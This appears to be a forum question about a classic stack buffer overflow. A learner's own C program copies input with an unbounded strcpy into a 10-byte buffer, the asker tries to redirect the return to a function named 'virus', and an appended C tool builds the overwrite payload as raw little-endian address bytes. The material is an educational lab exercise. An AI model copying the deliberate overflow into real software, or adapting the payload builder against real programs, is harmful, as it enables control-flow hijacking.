I am trying to see stack smashing via buffer overflow in action. More precisely, I am trying to change the return address on the stack so that the return, instead of going back to the caller function, redirects control to my code. But my half-baked knowledge seems to be getting in the way. My code is below:
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>

/* forward declarations: modern gcc rejects implicitly declared functions */
int func(char *arg);
void virus(void);

int main(int argc, char **argv)
{
    int a;
    func(argv[1]);
    printf("This message must not be printed");
    return (0);
}

int func(char *arg)
{
    char buffer[10];
    strcpy(buffer, arg);   /* unbounded copy: the deliberate overflow */
    printf("The buffer says..[%s/%p].\n", buffer, &buffer);
    return (0);
}

void virus(void)
{
    printf("I am a virus");
    exit(0);
}
I wish for the execution of the function "virus", obviously, instead of control going back to main() after "func" executes. My compilation command is:
gcc -g -O0 <filename.c> -fno-stack-protector
Also, I have disabled the address space randomization option of the kernel. I tried to give the input 12345678911111111111111110x7ffc7829bb36 (i.e. 1-9 followed by 16 1's). The reason is 9 bytes of buffer + 8 bytes address pointer + 8 bytes old frame pointer (so 16 1's in total). The hex at the end is the result of adding 16 bytes to the address of the "buffer" variable. Upon execution, control doesn't go back to the main function all right, but it doesn't go to my "virus" function either. The messages from "func" are displayed and then a seg fault message is appended. What could possibly be wrong here? My guess is that I don't know how to calculate the target address, even using the gdb debugger. Any help will work for me. Thanks.
Upvotes: 0
Views: 114
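An added example, not part of the question or of any answer on this page: a small builder for the argv[1] string that the overflow delivers. It shows the two mechanics the payload depends on: the overwriting address has to be the target function's address written as raw little-endian bytes (not the ASCII text of a hex number, which is what typing "0x7ffc..." on the command line produces), and strcpy() stops at the first zero byte, so a 64-bit address with zero top bytes is only partly copied and still works because the saved return address already holds zeros there. It assumes x86-64 Linux with user-space addresses whose top two bytes are zero, an offset from the start of the buffer to the saved return address that has been measured in gdb (it is not simply the buffer size plus 8, since the compiler pads and aligns locals), and a target taken from gdb's address of `virus`. The names `build_payload`, `payload_len`, `first_nul` and the values 24 and 0x401166 used in the usage line are placeholders chosen for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Index of the first zero byte in the little-endian encoding of v (8 if none).
   strcpy() stops copying at that byte, so only the bytes before it reach the stack. */
static size_t first_nul(uint64_t v)
{
    for (size_t i = 0; i < 8; i++)
        if (((v >> (8 * i)) & 0xff) == 0)
            return i;
    return 8;
}

/* Number of bytes strcpy() will deposit for this payload, or 0 when the target
   cannot be delivered through strcpy(): a non-zero byte after an interior NUL
   would never be copied. Bytes past the NUL keep the old return address's
   value, which is zero for any user-space x86-64 address (assumption), so
   targets like 0x401166 or 0x7ffc7829bb36 are deliverable. */
size_t payload_len(size_t offset, uint64_t target)
{
    size_t z = first_nul(target);
    if (z < 8 && (target >> (8 * z)) != 0)
        return 0;
    return offset + z;
}

/* Fill out[] with: offset filler bytes, then the target as raw little-endian
   bytes (NOT the ASCII text "0x7ffc..."), then a terminator.
   offset = measured distance from the start of the overflowed buffer to the
   saved return address (read it off in gdb, e.g. by comparing &buffer with
   the address of the slot above the saved frame pointer).
   Returns the number of bytes strcpy() will copy, or 0 on failure. */
size_t build_payload(unsigned char *out, size_t out_cap,
                     size_t offset, uint64_t target)
{
    size_t n = payload_len(offset, target);
    if (n == 0 || out_cap < offset + 9)
        return 0;
    memset(out, 'A', offset);                 /* filler up to the return slot */
    for (size_t i = 0; i < 8; i++)            /* little-endian byte order */
        out[offset + i] = (unsigned char)(target >> (8 * i));
    out[offset + 8] = '\0';
    return n;
}

/* Usage (placeholder values; take the real ones from gdb):
     ./payload 24 0x401166 > payload.bin
     ./vuln "$(./payload 24 0x401166)"
   The shell passes the bytes as argv[1]; there is no interior NUL, so
   nothing is lost before the address bytes. */
int main(int argc, char **argv)
{
    unsigned char out[512];
    if (argc != 3) {
        fprintf(stderr, "usage: %s <offset> <target-hex>\n", argv[0]);
        return 1;
    }
    size_t offset = (size_t)strtoull(argv[1], NULL, 0);
    uint64_t target = strtoull(argv[2], NULL, 16);
    size_t n = build_payload(out, sizeof out, offset, target);
    if (n == 0) {
        fprintf(stderr, "payload not deliverable through strcpy()\n");
        return 1;
    }
    fwrite(out, 1, n, stdout);
    return 0;
}
```

The builder refuses a target that has a non-zero byte after an interior zero byte, because strcpy() would never write it; for a non-PIE binary with the target in the 0x40xxxx range the copy ends after three bytes and that is exactly what is needed, since the rest of the saved return address is already zero.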